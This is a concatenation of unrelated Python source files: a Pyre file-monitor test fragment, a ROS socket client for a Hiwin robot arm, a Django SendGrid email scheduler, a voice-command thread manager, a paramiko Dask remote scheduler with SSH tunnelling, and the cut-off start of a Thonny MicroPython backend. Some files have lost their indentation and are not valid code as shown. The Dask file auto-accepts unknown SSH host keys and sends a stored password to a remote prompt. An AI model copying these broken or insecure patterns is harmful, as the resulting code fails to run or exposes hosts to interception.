configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.process_updated_files.side_effect = (
lambda files: UpdatedPaths(
updated_paths=[file.replace("ROOT", "ANALYSIS") for file in files],
deleted_paths=[],
)
)
# only create the monitor once the socket is open
with socket_created_lock:
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(SocketConnection, "connect")
# pyre-fixme[56]: Argument `tools.pyre.client.json_rpc` to decorator factory
# `unittest.mock.patch.object` could not be resolved in a global scope.
@patch.object(json_rpc, "perform_handshake")
@patch.object(ProjectFilesMonitor, "_watchman_client")
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_files_cleaned_up(
self,
_find_watchman_path,
_watchman_client,
perform_handshake,
_socket_connection,
) -> None:
with tempfile.TemporaryDirectory() as root:
configuration = mock_configuration()
configuration.extensions = []
configuration.log_directory = root + ".pyre"
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._alive = False # never enter watchman loop
monitor._run()
monitor_folder = os.path.join(".pyre", "file_monitor")
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.lock"))
)
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.pid"))
)
# pyre-fixme[56]: Argument `os.path` to decorator factory
# `unittest.mock.patch.object` could not be resolved in a global scope.
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath) -> None:
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
".pyre", "long_name" * 15, "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
SocketConnection(socket_link).connect()
server_thread.join()
|
Hiwin_RT605_Socket_v3_20190628101422.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd_v3 as TCP
import HiwinRA605_socket_Taskcmd_v3 as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
#data = '0'  # initial value for transmitted data
Arm_feedback = 1  # assume the arm starts out busy
NAME = 'socket_server'  # ROS node name
arm_mode_flag = False  # set True once an arm-mode command has been received
##------------class pos-------
class point():
    """Mutable 6-DOF pose: position (x, y, z) plus pitch/roll/yaw angles."""

    def __init__(self, x, y, z, pitch, roll, yaw):
        self.x, self.y, self.z = x, y, z
        self.pitch, self.roll, self.yaw = pitch, roll, yaw


# Shared pose updated by point_data() and consumed by Socket_command().
pos = point(0.0, 36.8, 11.35, -90.0, 0.0, 0.0)
##------------class socket_cmd---------
class socket_data():
    """Holds the most recent arm command fields received over ROS services."""

    def __init__(self, grip, setvel, ra, delay, setboth, action, Speedmode):
        (self.grip, self.setvel, self.ra, self.delay,
         self.setboth, self.action, self.Speedmode) = (
            grip, setvel, ra, delay, setboth, action, Speedmode)


# Shared command state filled in by Arm_Mode()/Speed_Mode().
socket_cmd = socket_data(0, 0.0, 0, 0, 0, 0, 0)
##-----------switch define------------##
class switch(object):
    """C-style switch/case helper.

    Iterating an instance yields its ``match`` method exactly once; each
    ``case(value)`` call in the loop body reports whether the switched
    value matches (with fall-through once a case has matched).
    """

    def __init__(self, value):
        self.value = value  # the value being switched on
        self.fall = False   # becomes True after the first matching case

    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        # Bug fix: the original used ``raise StopIteration`` here, which
        # PEP 479 (Python 3.7+) converts to RuntimeError whenever no case
        # breaks out of the for-loop.  A bare return ends the generator
        # cleanly in all Python versions.
        return

    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args:  # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
class StateFeedback():
    """Latest arm state and send-flag reported back by the controller."""

    def __init__(self, ArmState, SentFlag):
        self.ArmState, self.SentFlag = ArmState, SentFlag


# Shared feedback state published on the 'chatter' topic.
state_feedback = StateFeedback(0, 0)
class client():
    """Thin TCP client wrapper around the arm controller connection."""

    def __init__(self):
        # Connection is established lazily via get_connect(), not here.
        #self.get_connect()
        pass

    def get_connect(self):
        """Open the TCP connection to the arm controller."""
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.connect(('192.168.0.1', 8080))

    def send(self, msg):
        """Send a text command, UTF-8 encoded."""
        self.s.send(msg.encode('utf-8'))

    def get_recieve(self):
        """Receive up to 1024 bytes of feedback and return them as *bytes*.

        Callers index the raw bytes (e.g. feedback[2]), so the payload is
        deliberately returned undecoded.  Bug fix: the original called
        ``data.decode('utf-8')`` and discarded the result — a misleading
        dead statement that has been removed.
        """
        data = self.s.recv(1024)  # 1024 limits how much is read per call
        return data

    def close(self):
        """Close the socket."""
        self.s.close()


# Module-level singleton used by socket_client()/Socket_command().
Socket = client()
def point_data(x, y, z, pitch, roll, yaw):
    """Store a pose received from the strategy node into the shared ``pos``."""
    pos.x, pos.y, pos.z = x, y, z
    pos.pitch, pos.roll, pos.yaw = pitch, roll, yaw
##----------Arm Mode-------------###
def Arm_Mode(action, grip, ra, setvel, setboth):
    """Store an arm command received from the strategy node, then send it."""
    global arm_mode_flag
    socket_cmd.action, socket_cmd.grip, socket_cmd.ra = action, grip, ra
    socket_cmd.setvel, socket_cmd.setboth = setvel, setboth
    arm_mode_flag = True
    # Forward the freshly stored command over the TCP socket right away.
    Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode):  # receives the arm speed-mode setting from the strategy node
    socket_cmd.Speedmode = speedmode
# def point_data(req): ##接收策略端傳送位姿資料
# pos.x = '%s'%req.x
# pos.y = '%s'%req.y
# pos.z = '%s'%req.z
# pos.pitch = '%s'%req.pitch
# pos.roll = '%s'%req.roll
# pos.yaw = '%s'%req.yaw
# return(1)
# ##----------Arm Mode-------------###
# def Arm_Mode(req): ##接收策略端傳送手臂模式資料
# global arm_mode_flag
# socket_cmd.action = int('%s'%req.action)
# socket_cmd.grip = int('%s'%req.grip)
# socket_cmd.ra = int('%s'%req.ra)
# socket_cmd.setvel = int('%s'%req.vel)
# socket_cmd.setboth = int('%s'%req.both)
# arm_mode_flag = True
# Socket_command()
# return(1)
# ##-------Arm Speed Mode------------###
# def Speed_Mode(req): ##接收策略端傳送手臂模式資料
# global speed_mode_flag
# socket_cmd.Speedmode = int('%s'%req.Speedmode)
# return(1)
def socket_talker():  # create the ROS server node
    """Register the ROS services and publish the arm state until shutdown.

    Publishes [ArmState, SentFlag] from the shared state_feedback on the
    'chatter' topic at the loop rate below.
    """
    pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
    rospy.init_node(NAME)
    a = rospy.Service('arm_mode',arm_mode, Arm_Mode)  # serves arm mode data
    s = rospy.Service('arm_pos',arm_data, point_data)  # serves arm point data
    b = rospy.Service('speed_mode',speed_mode, Speed_Mode)  # serves speed mode data
    rate = rospy.Rate(100)  # 100 Hz (original comment said 10hz, but Rate(100) is used)
    print ("Ready to connect")
    while not rospy.is_shutdown():
        # hello_str = "hello world %s" % rospy.get_time()
        state = Int32MultiArray()
        state.data = [state_feedback.ArmState,state_feedback.SentFlag]
        pub.publish(state)
        rate.sleep()
##---------- socket packet transmission --------------##
##--------------- socket: send arm commands -----------------
def Socket_command():
    """Translate the pending socket_cmd into a TCP command string and send it.

    Dispatches on socket_cmd.action (PtoP / Line / SetVel / Delay / Mode)
    and, for motion commands, on socket_cmd.setboth (POS / EULER / BOTH),
    then resets the action to 6 (idle) and writes the command to Socket.

    NOTE(review): if no case matches (e.g. action is already 6), ``data``
    is never bound and print(data) would raise NameError; on Python 3.7+
    exhausting the switch generator can also surface as a RuntimeError
    (PEP 479).  Callers always set a valid action first — verify before
    relying on this path.
    """
    global Socket
    for case in switch(socket_cmd.action):
        #-------PtP Mode--------
        if case(Taskcmd.Action_Type.PtoP):
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
            break
        #-------Line Mode--------
        if case(Taskcmd.Action_Type.Line):
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                    break
            break
        #------- set the arm speed --------
        if case(Taskcmd.Action_Type.SetVel):
            data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
            break
        #------- set the arm delay time --------
        if case(Taskcmd.Action_Type.Delay):
            data = TCP.SetDelay(socket_cmd.grip,0)
            break
        #------- set the arm fast / safe mode --------
        if case(Taskcmd.Action_Type.Mode):
            data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
            break
    socket_cmd.action= 6  # reset to the initial (idle) mode state
    print(data)
    print("Socket:", Socket)
    #Socket.send(data.encode('utf-8'))# socket send: for python, translate to str first
    Socket.send(data)
##-----------socket client--------
def socket_client():
    """Connect to the arm controller and pump feedback until shutdown.

    Runs in its own thread (started from __main__).  Exits the process
    when the TCP connection cannot be established.
    """
    global Socket
    try:
        #Socket = client()
        Socket.get_connect()
        #Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        #Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080))#iclab computerx
        print('Connection has been successful')
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    #print('Connection has been successful')
    Socket_feedback(Socket)  # blocks until the arm reports shutdown
    rospy.on_shutdown(myhook)
    Socket.close()
def Socket_feedback(s):
    """Poll arm feedback packets and mirror them into state_feedback.

    Feedback is raw bytes; single bytes are compared by their ASCII codes
    ('48' == '0', '49' == '1', '54' == '6').  Loops until the arm reports
    the shutdown state.
    """
    Socket = s
    while 1:
        feedback_str = Socket.get_recieve()
        # arm state reported by the controller
        if str(feedback_str[2]) == '48':  # F: arm is Ready for the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':  # T: arm is busy, cannot run the next command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':  # 6: strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        # confirm the sent flag
        if str(feedback_str[4]) == '48':  # returned 0: false
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':  # returned 1: true
            state_feedback.SentFlag = 1
        ##--------------- socket arm-command transmission end -----------------
        if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
            break
##----------- socket client end --------
##------------- socket packet transmission end --------------##
def myhook():
    """rospy shutdown hook: announce that the node is going down."""
    print("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6  # start in the initial (idle) mode state
    ## multithreading: run the TCP client alongside the ROS node
    t = threading.Thread(target=socket_client)
    t.start()  # start the client thread
    #time.sleep(1)
    try:
        socket_talker()
    except rospy.ROSInterruptException:
        pass
    t.join()
    ## multithreading end
|
signals.py | from django.db.models.signals import post_save
from django.dispatch import receiver
from django.conf import settings
import threading
import sendgrid
import time
from sendgrid.helpers.mail import Mail
from .models import Email
def create_data(text, date):
    """Build the dynamic-template payload for a scheduled email.

    *date* is rendered with strftime("%c") and prefixed with "UTC ".
    """
    return {
        "data": {
            "sent_datetime": "UTC " + date.strftime("%c"),
            "text": text,
        }
    }
def send_email(to_email, template_data):
    """Send one templated email through SendGrid and return the API response."""
    api_client = sendgrid.SendGridAPIClient(settings.SENDGRID_API_KEY)
    message = Mail(from_email=settings.SENDGRID_FROM, to_emails=to_email)
    message.template_id = settings.SENDGRID_TEMPLATE_ID
    message.dynamic_template_data = template_data
    return api_client.send(message)
def schedule_email(em):
    """Mark *em* as scheduled, wait out its delay, send it, persist the outcome.

    Bug fix: the original set STATUS_SENT *before* attempting the send and
    never called em.save() on the success path, so a successful send was
    never persisted.  The status now reflects the actual result and is
    saved on both paths.
    """
    em.status = Email.STATUS_SHCEDULED  # (sic) spelling matches the model constant
    em.save()
    time.sleep(em.delay)
    try:
        send_email(em.to_email,
                   create_data(em.body_text, em.scheduled_for))
    except Exception:
        em.status = Email.STATUS_SENT_ERROR
    else:
        em.status = Email.STATUS_SENT
    em.save()
@receiver(post_save, sender=Email)
def email_added(sender, instance, created, **kwargs):
    """post_save hook: schedule sending for every newly created Email row.

    schedule_email runs in a background thread so the save() call that
    created the row is not blocked by the delay/send.
    """
    if created:
        t = threading.Thread(target=schedule_email, args=(instance, ))
        t.start()
main.py | #!/usr/bin/env python
"""
Streams in always on microphone, transcribes (speech (audio) to text), runs results through function to find user defined wake words and commands.
Main components:
-this file, master file which creates shared queues, starts up threads, kills threads
-STT - GCP
-server - TCP socket
-voice command system that parses commands and runs the commands
Both of these are IO-bound, both of them need to run all the time. We need be asynchronous, for now that's with multithreading.
@author: Cayden Pierce, Emex Labs
"""
import sys
import time
from queue import Queue, Empty
from threading import Thread
from rx import of, operators as op
import random
from rx.subject import Subject
from utils.gcp_stt import run_google_stt
from utils.gcp_translate import run_google_translate
from utils.voice_command_server import run_voice_command_server, run_voice_command
from utils.ASGAudioServer import run_audio_server
from language_options import language_options
def make_new_thread(thread_q, thread_holder, translate_q, obj_q, audio_stream_observable):  # handles making new threads and adding them to the thread holder for the main loop
    """Service one pending thread request from thread_q, if any.

    Only "translate" requests are handled: cmd "start" spins up an STT
    thread plus a translator thread (no-op if both already running); any
    other cmd stops and joins both via their cooperative ``do_run`` flags.
    Returns silently when the queue is empty.
    """
    try:
        thread_obj = thread_q.get(False)  # non-blocking; raises Empty when idle
        if thread_obj:
            print("thread request")
            thread_type = thread_obj["type"]
            if thread_type == "translate":
                if thread_obj["cmd"] == "start":
                    #first, check if translate mode is already running
                    try:
                        translate_stt_thread = thread_holder["translate_stt"]
                        translater_thread = thread_holder["translater"]
                        if translate_stt_thread is not None or translater_thread is not None:
                            return
                    except KeyError:
                        pass
                    language = thread_obj["language"]
                    source_language = language_options[language.lower()]
                    #source_language = "es"
                    translate_stt_thread = Thread(target = run_google_stt, args = (translate_q, audio_stream_observable, source_language)) #transcribes a different language
                    translater_thread = Thread(target = run_google_translate, args = (translate_q, obj_q, source_language)) #takes those translations and converts them into our target language
                    print("STARTING TRANSLATION THREAD")
                    translate_stt_thread.start()
                    translater_thread.start()
                    thread_holder["translate_stt"] = translate_stt_thread
                    thread_holder["translater"] = translater_thread
                else: #if cmd is kill, then stop the translater, if it's running
                    try:
                        translate_stt_thread = thread_holder["translate_stt"]
                        translater_thread = thread_holder["translater"]
                    except KeyError:
                        return
                    if translate_stt_thread:
                        print("attempting to kill (((((((((((((((((((((((((((((((((((((((((")
                        # cooperative shutdown: the worker loop polls do_run
                        translate_stt_thread.do_run = False
                        translate_stt_thread.join()
                        print("kill success (((((((((((((((((((((((((((((((((((((((((")
                        thread_holder["translate_stt"] = None
                    if translater_thread:
                        print("2attempting to kill (((((((((((((((((((((((((((((((((((((((((")
                        translater_thread.do_run = False
                        translater_thread.join()
                        print("2kill success (((((((((((((((((((((((((((((((((((((((((")
                        thread_holder["translater"] = None
    except Empty:
        pass
def main():
    """Create the shared queues, start the worker threads, run the manager loop.

    Bug fixes relative to the original: the shutdown code was unreachable
    (it followed an infinite ``while True``), referenced the undefined name
    ``audio_server``, and called ``Thread.kill()`` which does not exist on
    threading.Thread.  The loop now runs until KeyboardInterrupt, then
    signals the workers via their cooperative ``do_run`` flags and joins.
    """
    # Shared queues between the threads.
    transcript_q = Queue()  # raw transcriptions
    cmd_q = Queue()  # parsed commands (currently voice command runs in run_google_stt)
    obj_q = Queue()  # generic object queue, e.g. {"type": "transcript", "data": "hello world"}
    thread_q = Queue()  # requests to the main thread to start a new thread
    translate_q = Queue()  # holds text to be translated to english
    test_q = Queue()  # a test queue that no one will ever read
    # Observable sharing the audio stream with any subscriber.
    audio_stream_observable = Subject()
    print(dir(audio_stream_observable))
    server_thread = Thread(target=run_voice_command_server, args=(transcript_q, cmd_q, obj_q))
    audio_server_thread = Thread(target=run_audio_server, args=(audio_stream_observable,))
    stt_thread = Thread(target=run_google_stt, args=(transcript_q, audio_stream_observable))
    voice_command_thread = Thread(target=run_voice_command, args=(transcript_q, cmd_q, obj_q, thread_q))
    # Cooperative-shutdown flag polled by the audio server loop.
    audio_server_thread.do_run = True
    server_thread.start()  # create connection with ASG and handle sending it stuff
    audio_server_thread.start()
    stt_thread.start()  # convert speech to text, fill queue with transcribed speech
    voice_command_thread.start()  # receive output from STT, process it, send results and commands to ASG
    # Serve requests to start/stop user-triggered threads (e.g. translation).
    thread_holder = dict()
    try:
        while True:
            make_new_thread(thread_q, thread_holder, translate_q, obj_q, audio_stream_observable)
            time.sleep(0.2)
    except KeyboardInterrupt:
        pass
    # Shutdown: flag the cooperative loops to stop, then join every thread.
    audio_server_thread.do_run = False
    stt_thread.do_run = False
    server_thread.join()
    stt_thread.join()
    voice_command_thread.join()
    audio_server_thread.join()
# Script entry point: start all worker threads and run the manager loop.
if __name__ == "__main__":
    main()
|
dask_remote_scheduler.py | import distributed
from tornado.ioloop import IOLoop
from threading import Thread
from distributed import Scheduler, Worker, Executor
import paramiko
import select
import getpass
import os
import socket
import select
import threading
from pipeline import msg
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
g_verbose = True
def verbose(s):
    """Log *s* at DEBUG level when global verbose logging is switched on."""
    if not g_verbose:
        return
    msg.logMessage(s, msg.DEBUG)
class ForwardServer(SocketServer.ThreadingTCPServer):
    """Threaded TCP server that accepts local connections to be forwarded
    over the SSH tunnel (one Handler per connection)."""
    # Let worker threads die with the process and allow quick rebinds.
    daemon_threads = True
    allow_reuse_address = True
class Handler(SocketServer.BaseRequestHandler):
    """Forwards one accepted local connection through the SSH transport.

    Subclasses are created dynamically (see RemoteScheduler.forward_tunnel)
    with the chain_host/chain_port/ssh_transport class attributes filled in.
    """

    def handle(self):
        # Open a direct-tcpip channel to the remote endpoint.
        try:
            chan = self.ssh_transport.open_channel('direct-tcpip',
                                                   (self.chain_host, self.chain_port),
                                                   self.request.getpeername())
        except Exception as e:
            verbose('Incoming request to %s:%d failed: %s' % (self.chain_host,
                                                              self.chain_port,
                                                              repr(e)))
            return
        if chan is None:
            verbose('Incoming request to %s:%d was rejected by the SSH server.' %
                    (self.chain_host, self.chain_port))
            return
        verbose('Connected! Tunnel open %r -> %r -> %r' % (self.request.getpeername(),
                chan.getpeername(), (self.chain_host, self.chain_port)))
        # Shuttle bytes in both directions until either side closes
        # (recv returning 0 bytes means EOF on that side).
        while True:
            r, w, x = select.select([self.request, chan], [], [])
            if self.request in r:
                data = self.request.recv(1024)
                if len(data) == 0:
                    break
                chan.send(data)
            if chan in r:
                data = chan.recv(1024)
                if len(data) == 0:
                    break
                self.request.send(data)
        peername = self.request.getpeername()
        chan.close()
        self.request.close()
        verbose('Tunnel closed from %r' % (peername,))
class DaskScheduler(object):
    """Launches the dask scheduler on the remote host via an SSH channel
    and babysits its output (queue status, password prompts)."""

    def __init__(self, client, ipaddr, port, password, runscript):
        # client: a connected paramiko.SSHClient.
        # runscript: remote script that starts the scheduler, given ip/port.
        self.client = client
        self.ipaddr = ipaddr
        self.port = port
        self.runscript = runscript
        self.password = password
        # self.command = "/usr/common/graphics/visit/camera/runscript.sh {0} {1}".format(ipaddr, port)
        self.command = runscript + " {0} {1}".format(ipaddr, port)
        msg.logMessage(self.command,msg.DEBUG)

    def serve(self):
        """Run the scheduler command and relay its output until it exits.

        Watches for batch-queue status lines to surface progress messages,
        and answers a "Password" prompt with the stored password.
        """
        msg.logMessage("Serving: " + self.command,msg.INFO)
        channel = self.client.get_transport().open_session()
        msg.logMessage(channel.get_pty(),msg.DEBUG)
        # channel.exec_command('tty')
        channel.exec_command(self.command)
        readytorun=False
        while True:
            if channel.exit_status_ready():
                break
            rl, wl, xl = select.select([channel], [], [], 10.0)
            if len(rl) > 0:
                line = channel.recv(1024)
                msg.logMessage(line)
                if 'queued and waiting for resources' in line:
                    msg.showMessage('Execution queued and waiting for resources...')
                elif 'has been allocated resources' in line:
                    msg.showMessage('Execution has been allocated resources...')
                    readytorun=True
                if readytorun and line:
                    msg.showMessage('Executing job...')
                    readytorun=False
                if line.find("Password") >= 0:
                    msg.logMessage("writing password",msg.DEBUG)
                    channel.sendall(self.password + "\n")
        msg.logMessage("Ending Dask Scheduler",msg.INFO)
class DaskWorker(object):
    """Launches dask workers on the remote host and drains their output."""

    def __init__(self, client, ipaddr, port, nodes, partition, time, procs, threads):
        # client: a connected paramiko.SSHClient; the remaining arguments
        # describe the scheduler address and the batch allocation shape.
        self.client = client
        self.ipaddr = ipaddr
        self.port = port
        self.nodes = nodes
        self.partition = partition
        self.time = time
        self.procs = procs
        self.threads = threads
        self.command = "/usr/common/graphics/visit/camera/runlocalserver.sh {0} {1}".format(ipaddr, port)
        # self.command = "/usr/common/graphics/visit/camera/runserver.sh {0} {1} {2} {3} {4} {5} {6}".format(ipaddr, port, nodes, partition, time, procs, threads)
        msg.logMessage(self.command,msg.DEBUG)

    def serve(self):
        """Run the worker command and log its output.

        NOTE(review): the exit-status check is commented out, so this loop
        never terminates on its own — it relies on the channel/process
        being torn down externally.
        """
        msg.logMessage("Serving Worker: " + self.command,msg.INFO)
        channel = self.client.get_transport().open_session()
        channel.exec_command(self.command)
        # client.exec_command(self.command)
        while True:
            # if channel.exit_status_ready():
            #     break
            rl, wl, xl = select.select([channel], [], [], 10.0)
            if len(rl) > 0:
                msg.logMessage("rl:", channel.recv(1024),msg.DEBUG)
        msg.logMessage("Ending Dask Worker",msg.INFO)
# client = paramiko.SSHClient()
# client.load_system_host_keys()
# client.connect('edison.nersc.gov', username="hkrishna")
class RemoteScheduler():
    """
    Create a remote executor: connect over SSH, pick a free remote port,
    start the dask scheduler there, and forward a free local port to it.
    """

    def __init__(self, addr, username, loop, password, machine, runscript):
        self.loop = loop
        self.addr = addr
        self.username = username
        self.password = password
        self.command = runscript
        self.client = paramiko.SSHClient()
        self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.client.load_system_host_keys()
        # An empty password means "use key-based auth".
        if len(password) > 0:
            self.client.connect(addr, username=username, password=password)
        else:
            self.client.connect(addr, username=username)
        # Ask the remote side for its hostname and a free port by binding
        # and immediately closing an ephemeral socket there.
        stdin, stdout, stderr = self.client.exec_command(
            "python -c 'import socket; s=socket.socket(); s.bind((\"\", 0)); result = socket.gethostbyname(socket.gethostname()) + \":\" + str(s.getsockname()[1]); s.close(); print(result)'")
        stdin.close()
        for line in stdout.read().splitlines():
            result = line
        self.remote_addr = result.split(":")
        self.local_port = self.get_free_port()
        # Optional override of the remote host (e.g. a login-node alias).
        if len(machine) > 0:
            self.remote_addr[0] = machine
        msg.logMessage((self.local_port, self.remote_addr),msg.DEBUG)
        self.start_scheduler(self.remote_addr[0], self.remote_addr[1], self.client, password, runscript)
        self.executor = None
        self.forward_tunnel(self.local_port, self.remote_addr[0], self.remote_addr[1], self.client.get_transport())

    def execute(self):
        """Create the distributed Executor against the forwarded local port."""
        msg.logMessage("Starting Executor",msg.INFO)
        # self.executor = Executor("{0}:{1}".format(self.remote_addr[0], self.remote_addr[1]))
        self.executor = Executor("{0}:{1}".format("localhost", self.local_port))
        msg.logMessage("End Executor",msg.INFO)

    def close(self):
        """Best-effort kill of the remote scheduler/worker processes."""
        self.client.exec_command("killall dask-scheduler dask-worker")
        self.client.exec_command("killall " + os.path.basename(self.command))

    def get_free_port(self):
        """Return a free local TCP port (bind to 0 and read it back)."""
        s = socket.socket()
        s.bind(("", 0))
        localport = s.getsockname()[1]
        s.close()
        return localport

    """
    def start_slurm_worker(self, ipaddr, port, nodes, partition, time, procs, threads, client):
        self.dask_worker = DaskWorker(client, ipaddr, port, nodes, partition, time, procs, threads)
        server_thread = threading.Thread(target=dask_worker.serve)
        server_thread.daemon = True
        server_thread.start()
    """

    def start_scheduler(self, ipaddr, port, client, password, runscript):
        """Start DaskScheduler.serve in a (non-daemon) background thread."""
        self.dask_sched = DaskScheduler(client, ipaddr, port, password, runscript)
        server_thread = threading.Thread(target=self.dask_sched.serve)
        # server_thread.daemon = True
        server_thread.start()

    def forward_tunnel(self, local_port, remote_host, remote_port, transport):
        """Forward local_port to remote_host:remote_port over *transport*.

        A Handler subclass is synthesized so each accepted connection knows
        its chain endpoint and SSH transport; the ForwardServer runs in a
        daemon thread.
        """
        class SubHander(Handler):
            chain_host = remote_host
            chain_port = int(remote_port)
            ssh_transport = transport
        fs = ForwardServer(('', int(local_port)), SubHander)
        msg.logMessage(("FORWARDING: ", local_port, remote_host, remote_port),msg.INFO)
        server_thread = threading.Thread(target=fs.serve_forever)
        server_thread.daemon = True
        server_thread.start()
|
backend.py | from thonny.common import (
InputSubmission,
InterruptCommand,
EOFCommand,
parse_message,
ToplevelCommand,
ToplevelResponse,
InlineCommand,
InlineResponse,
UserError,
serialize_message,
BackendEvent,
ValueInfo,
)
import sys
import logging
import traceback
import queue
from thonny.plugins.micropython.connection import (
ConnectionClosedException,
ConnectionFailedException,
)
from textwrap import dedent
import ast
import re
from queue import Queue, Empty
import threading
import os
import time
from thonny.misc_utils import find_volumes_by_name, sizeof_fmt
import jedi
import io
import tokenize
from thonny.running import EXPECTED_TERMINATION_CODE
import binascii
import shutil
# See https://github.com/dhylands/rshell/blob/master/rshell/main.py
# for UART_BUFFER_SIZE vs USB_BUFFER_SIZE
# ampy uses 32 bytes: https://github.com/pycampers/ampy/blob/master/ampy/files.py
# I'm not worrying so much, because reader thread reads continuously
# and writer (SerialConnection) has it's own blocks and delays
BUFFER_SIZE = 512
BAUDRATE = 115200
ENCODING = "utf-8"
# Commands: single control bytes written to the board's REPL to change mode.
RAW_MODE_CMD = b"\x01"      # switch to raw REPL (FIRST_RAW_PROMPT is read after this)
NORMAL_MODE_CMD = b"\x02"   # switch back to the friendly REPL (NORMAL_PROMPT follows)
INTERRUPT_CMD = b"\x03"     # interrupt running code
SOFT_REBOOT_CMD = b"\x04"   # soft reboot
# Output tokens: byte markers the board emits that delimit protocol messages.
THONNY_MSG_START = b"\x02"
THONNY_MSG_END = b"\x04"
EOT = b"\x04"
NORMAL_PROMPT = b">>> "
LF = b"\n"
OK = b"OK"
# first prompt when switching to raw mode (or after soft reboot in raw mode)
# Looks like it's not translatable in CP
# https://github.com/adafruit/circuitpython/blob/master/locale/circuitpython.pot
FIRST_RAW_PROMPT = b"raw REPL; CTRL-B to exit\r\n>"
RAW_PROMPT = b">"
# Regex matching any byte sequence that can terminate a block of output.
BLOCK_CLOSERS = re.compile(
    b"|".join(map(re.escape, [LF, EOT, THONNY_MSG_START, NORMAL_PROMPT, FIRST_RAW_PROMPT]))
)
logger = logging.getLogger("thonny.micropython.backend")
def debug(msg):
    # The early return deliberately disables debug output; remove it to get
    # stderr tracing of the protocol exchanges below.
    return
    print(msg, file=sys.stderr)
class MicroPythonBackend:
    def __init__(self, connection, clean, api_stubs_path):
        """Set up state, start the command-reader thread, then run the main loop.

        connection: byte stream to the MicroPython board.
        clean: if True, interrupt the board and wipe its environment first.
        api_stubs_path: directory holding API stub files for completions.
        """
        self._connection = connection
        self._cwd = None
        self._interrupt_requested = False
        self._cancel_requested = False
        self._command_queue = Queue()  # populated by reader thread
        self._progress_times = {}  # per-command-id timestamp of last progress event
        self._api_stubs_path = api_stubs_path
        self._command_reading_thread = threading.Thread(target=self._read_commands, daemon=True)
        self._command_reading_thread.start()
        self._startup_time = time.time()
        self._ctrl_suggestion_given = False
        try:
            self._prepare(clean)
            self._mainloop()
        except ConnectionClosedException:
